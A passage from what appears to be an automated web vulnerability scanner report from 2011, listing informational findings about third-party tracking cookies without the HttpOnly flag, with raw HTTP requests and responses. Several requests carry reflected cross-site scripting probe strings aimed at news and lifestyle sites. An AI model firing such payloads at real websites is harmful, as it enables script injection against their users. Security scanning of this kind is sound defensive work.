User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: xltl=eJxdjrEKAjEQBf8lfSC72d1kYyUqeI2FYi3J7QWsxUr8d%252BOBjd0r5jFTC5XXo8TirtPebcbC4gJwNiHJ2IO0njVhCzhrTqxMpis3Htvj72G9AoBEpQxL1LkrsSYRqxZ4wfblAIp73u12wUDnwyoDLg44BiUAlKSA4Z%252BcTrtVIsW1OCLY2At39BR69lVR%252FdwEWzab6zLS3h8RnDXh; BFF=eJydkL0SwiAQhN%252BFJ%252BAgCQEafxqZUSzCODGNk9LaUvPugkG8ZMQZ0963t3e7vQJQ95sCqogDWtiVlJIRfVVQiVp7wBU5HK3b7c%252BXk2mMI7r37OdOGefYBmv5F9BlTLqcdmLixQ2jhbHbB4VAy5HWNK59KAYsgfmOSGRmFO636NcXiL%252B2OS3HAEaw3mCXkKJ6AzSbqnkiw5JKl%252FaXrynbyF%252FxBRWZqIEMT9BzoOo%253D; TFF=eJydkj0OgzAMRu%252FCCWxDcDALx%252BiagaFSt3ZD3L1p8yMaEsl0QEmk98j3yXFCKNtTkKRDGBZCWKZpom52QrLdBWf%252FjWz9Amm7n3j88H3B0xyOR4%252BzpjP8CsMPycCRNOd%252Fr7f14V5r1zC41cJcbG3%252Ba22UrcNN5BXoSZ3swJsLyaKmnQcV8xgtRJJamQzWOnw9SNszX3bI92Dhcda0Rpoj1OdeTXbg1fdw1q4mI1tLFl5y5G2Fx9bLp8LjrOmM%252FQ1RoAzW; EVX=eJw9ybENgDAMBMBdMoHfYGK%252Fh7FSpqZE2R2lgO6kGwSfyYiwHNRtyZtwNlzdq5fKWXJoWaHlJP51%252BdZQsnetFzSwFF4%253D

Response

HTTP/1.1 302 Found
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: image/gif
Set-Cookie: TFF=eJyVkz0OgzAMRu%252FCCWwDcTALx%252BjKwFCpW7sh7t7wkwAmrcyAEtB7sa0v9EIo41uQpECoOkLomqahou2FZHwKtuFx7MMCcTtdeJz5UvHUrq9Hj5NmM8IK1YlkdBtJkZw%252FrWcPj%252BHVf4bCaKQp6tzUq%252FeHR2sdTtqdzigoUJI5jwNf38hj06x5kMrDedAz6J5qzM2weBC3V17PkOqg8jhpViPmCNnc850deHMdTtrdzshnbyTwzvsMr2%252Fkwp%252Bz8af%252F0Osb%252BcOYvpgADJg%253D; expires=Tue, 10-Jan-2012 13:06:07 GMT; path=/; domain=.exelator.com
Location: http://dts1.raasnet.com/dts/exelate/in?segments=&t=i
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Server: HTTP server


5.38. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s72097517517395  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s72097517517395

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s72097517517395?AQB=1&ndh=1&t=12/8/2011%2012%3A48%3A50%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//drupal.org/cases&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:20 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 12:49:20 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 12:49:20 GMT
Last-Modified: Tue, 13 Sep 2011 12:49:20 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6DFFD0-5DB6-4F3F9D04"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www374
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.39. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s83483789157502  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s83483789157502

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s83483789157502?AQB=1&ndh=1&t=12/8/2011%2013%3A8%3A42%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/%3F4324a%2527-alert%28document.location%29-%25272befc103ff4%3D1&r=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.7&v=Y&k=Y&bw=1106&bh=816&p=Mozilla%20Default%20Plug-in%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BGoogle%20Earth%20Plugin%3BJava%28TM%29%20Platform%20SE%206%20U26%3BJava%20Deployment%20Toolkit%206.0.260.3%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BWPI%20Detector%201.4%3BGoogle%20Updater%3BQuickTime%20Plug-in%207.7%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/?4324a%27-alert(document.location)-%272befc103ff4=1
Cookie: s_vi_rrswx7Cx7Frqx7Cx7Eugctuf=[CS]v4|271C9A0205013AFB-6000010B000D5654|4E393403[CE]; s_vi_x7Cgmlox60glm=[CS]v4|271C9A0205013AFB-6000010B000D5657|4E393403[CE]; s_vi_cdgx7Fsu=[CS]v4|271CCE90851604FB-400001A5E000FC45|4E399D20[CE]; s_vi_lex7Fihxxx7Fx7Cgiq=[CS]v4|2727EC2905010CA8-6000011460164A05|4E4FD852[CE]; s_vi_lex7Fihxxx7Fx7Chxxc=[CS]v4|2727ECDB05010F60-600001068035C75A|4E4FD9B3[CE]; s_vi_kx7Cmx7Cix7Edx7Fx7Fbixx=[CS]v4|2727F38685162CE5-40000183603608D2|4E500D14[CE]; s_vi_jcyonx7Eyjabola=[CS]v4|2727F4A185010391-40000101C018DBF5|4E500D13[CE]; s_vi_dinydefxxelh=[CS]v4|272A27560501363F-40000104C0125943|4E544EA8[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F7FB8515A3B5-600001750000D6D3|4E65EFF6[CE]; s_vi_x7Fbqsx7Cuex7Eyfubcydi=[CS]v4|273321F405158E8D-6000017680001134|4E6643E7[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|273321F405158E8D-6000017680001136|4E6643E7[CE]; s_vi_iex608x3Bgbx7Dnaxx=[CS]v4|27365326051636CC-400001A380004C94|4E6D4EF3[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|273701C005159759-60000176201D1B1E|4E6E037C[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:08:24 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:08:24 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:08:24 GMT
Last-Modified: Tue, 13 Sep 2011 13:08:24 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0448-1517-3C548CC2"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www637
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.40. http://mdwsavannah.112.2o7.net/b/ss/mdwsavannah/1/H.20.3/s86790688387118  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mdwsavannah.112.2o7.net
Path:   /b/ss/mdwsavannah/1/H.20.3/s86790688387118

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/mdwsavannah/1/H.20.3/s86790688387118?AQB=1&ndh=1&t=12/8/2011%2013%3A4%3A21%201%20300&ce=ISO-8859-1&pageName=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&g=http%3A//savannahnow.com/&r=http%3A//savannahnow.com/&cc=USD&ch=Savannah%20Morning%20News&server=Savannah%20Morning%20News%20-%20savannahnow.com&pageType=savannahnow.com/&c1=Frontpage&c2=savannahnow.com%20%7C%20Savannah%20Morning%20News%20%7C%20Savannah%2C%20GA%20source%20for%20Breaking%20Local%20News%2C%20Sports%2C%20Entertainment%20%26%20Weather%20%7C%20Savannah%20News%20Press&c15=SE&c16=Metro&c17=Home&c18=97010%20Home&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1155&bh=870&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: mdwsavannah.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://savannahnow.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi_atamox7Ecaihem=[CS]v4|273678D105013232-60000102803384B7|4E6CF1A1[CE]; s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; s_vi_x7Eaiex7Cx7Ex7Dc=[CS]v4|2736FFD8051613AB-600001A280003EFD|4E6DFFB0[CE]

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 13:04:04 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fox7Cxxjx7Djeejc=[CS]v4|2736FFD10515974F-6000017620169A35|4E6DFFA1[CE]; Expires=Sat, 10 Sep 2016 13:04:04 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Sun, 11 Sep 2011 13:04:04 GMT
Last-Modified: Tue, 13 Sep 2011 13:04:04 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E6E0344-65FF-06BA6CCE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www427
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

5.41. http://p.raasnet.com/partners/dfp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/dfp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/dfp?partner=40046&ord=0.5825194382847674 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:18:54 GMT;
Content-Type: text/javascript
Content-Length: 21
Date: Mon, 12 Sep 2011 13:05:33 GMT
Connection: close

rasegs='rasegs=seg2';

5.42. http://p.raasnet.com/partners/oxmap  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/oxmap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/oxmap?external_user_id=8ceb81a1-f08d-353c-163f-89b1b78ecd62 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:27 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:07 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.43. http://p.raasnet.com/partners/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1 HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu; lpp=1965

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=155198643408292; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:28 GMT;
Set-Cookie: lpp=1784c8199cfe69ffd2e65a19; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:08 GMT;
Content-Type: image/jpeg
Content-Length: 0
Date: Mon, 12 Sep 2011 13:06:07 GMT
Connection: close


5.44. http://p.raasnet.com/partners/universal/in  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://p.raasnet.com
Path:   /partners/universal/in

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f HTTP/1.1
Host: p.raasnet.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: o=0; u=153094112679120; ubd=AtEmSNACJQAAA8ZOQvzu

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Pragma: no-cache
Cache-Control: private, no-cache, no-store, max-age=0
P3P: policyref="http://a1.raasnet.com/a?t=p3p", CP="NON NID CURa ADMo DEVo PSAo PSDo HISo OUR IND UNI PUR COM NAV INT DEM CNT STA POL HEA PRE"
Set-Cookie: u=153094112679120; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: o=0; path=/; domain=.raasnet.com; expires=Sat, 17-Jan-2037 19:19:26 GMT;
Set-Cookie: lpp=1965; path=/; domain=.raasnet.com; expires=Mon, 12-Sep-2011 13:08:06 GMT;
Content-Type: text/html
Content-Length: 207
Date: Mon, 12 Sep 2011 13:06:06 GMT
Connection: close

<img border='0' width='1' height='1' src='http://p.raasnet.com/partners/exelate'/><img border='0' width='1' height='1' src='http://rd.rlcdn.com/rd?site=43881&type=redir&url=http://dts1.raasnet.com/dts
...[SNIP]...

5.45. http://pixel.quantserve.com/api/segments.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /api/segments.json

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /api/segments.json?a=p-573scDfDoUH6o&callback=qcCallback HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EIIBIQHYB4HRBprRW9iB4QschAEA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EH0BGgHYB7vR0b2IHh2EsRA; expires=Sun, 11-Dec-2011 13:07:51 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: application/x-javascript
Cache-Control: private, no-transform, must-revalidate, max-age=600
Expires: Mon, 12 Sep 2011 13:17:51 GMT
Content-Length: 39
Date: Mon, 12 Sep 2011 13:07:51 GMT
Server: QS

qcCallback({"segments":[{"id":"D"}]});

5.46. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=403227748;fpan=1;fpa=P0-1895254174-1315850535699;ns=0;url=http%3A%2F%2Fwww.popsugar.com%2Fajaxharness1274b%2522-alert(document.location)-%2522faa5baba69b%3Fharness_requests%3D%257B%2522replacements%2522%253A%2520%255B%257B%2522sugar-menu-subnav-items%2522%253A%2520%2522%252Fsugar-subnav-items%253Ffastcache%253D1%2526fg_locale%253D0%2522%257D%252C%2520%257B%2522user-feedback-div%2522%253A%2520%2522%252Fsugar-user-feedback-form%253Fissue%253Dinfinite%252520scroll%2522%257D%255D%252C%2520%2522callbacks%2522%253A%2520%255B%255D%257D;ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue;ce=1;je=1;sr=1920x1200x16;enc=n;ogl=site_name.PopSugar;dst=1;et=1315850535698;tzo=300;a=p-36POJYHTosuxU HTTP/1.1
Host: pixel.quantserve.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.popsugar.com/ajaxharness1274b%22-alert(document.location)-%22faa5baba69b?harness_requests=%7B%22replacements%22%3A%20%5B%7B%22sugar-menu-subnav-items%22%3A%20%22%2Fsugar-subnav-items%3Ffastcache%3D1%26fg_locale%3D0%22%7D%2C%20%7B%22user-feedback-div%22%3A%20%22%2Fsugar-user-feedback-form%3Fissue%3Dinfinite%2520scroll%22%7D%5D%2C%20%22callbacks%22%3A%20%5B%5D%7D
Cookie: mc=4e29da7c-0fd05-96398-5e4b5; d=EAkBHwHXB4GxBprRW9iBACyEAQA

Response

HTTP/1.1 204 No Content
Connection: close
Set-Cookie: d=EMMBGAHYB7vR0b2IENhCEA; expires=Sun, 11-Dec-2011 13:01:57 GMT; path=/; domain=.quantserve.com
Set-Cookie: mc=; expires=Thu, 01-Jan-1970 00:00:10 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Date: Mon, 12 Sep 2011 13:01:57 GMT
Server: QS


5.47. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
